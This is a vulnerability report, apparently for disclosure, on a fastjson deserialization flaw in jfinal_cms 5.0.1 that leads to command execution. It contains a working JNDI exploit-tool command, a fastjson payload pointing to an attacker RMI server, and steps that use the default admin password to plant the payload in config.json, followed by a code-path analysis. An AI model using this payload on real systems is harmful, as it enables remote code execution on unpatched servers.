Description
Vulnerability summary
A command execution vulnerability exists in jfinal_cms 5.0.1
JDK version requirements:
- JDK version used based on RMI<=6u141, 7u131, 8u121
- JDK version used based on LDAP<=6u211, 7u201, 8u191.
jfinal_cms version:5.0.1
vulnerability recurrence
JDK version used in the test: JDK8u101
Run the tool on kali, start rmi and ldap services
https://github.com/feihong-cs/JNDIExploit
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"
replace rmi or ldap address in payload:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.248.128:1099/6dxg2x",
"autoCommit":true
}
}Create the config.json file and copy the payload in
Log in to the Backstage management system, select template management
default password:admin/admin123
Click Replace file
Replace with the config.json file containing the payload just created

Visit /ueditor, execute the command to pop up the calculator
http://localhost:8080/jfinal_cms/ueditor
Vulnerability analysis
com.jflyfox.component.controller.Ueditor
The ActionEnter class is instantiated in the index method of the /ueditor route

com.baidu.ueditor.ActionEnter#ActionEnter
The ConfigManager class is instantiated in the constructor of the ActionEnter class

com.baidu.ueditor.ConfigManager#ConfigManager
The construction method of ConfigManager calls initEnv()

com.baidu.ueditor.ConfigManager#initEnv
Call JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload.

com.baidu.ueditor.ConfigManager
The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization








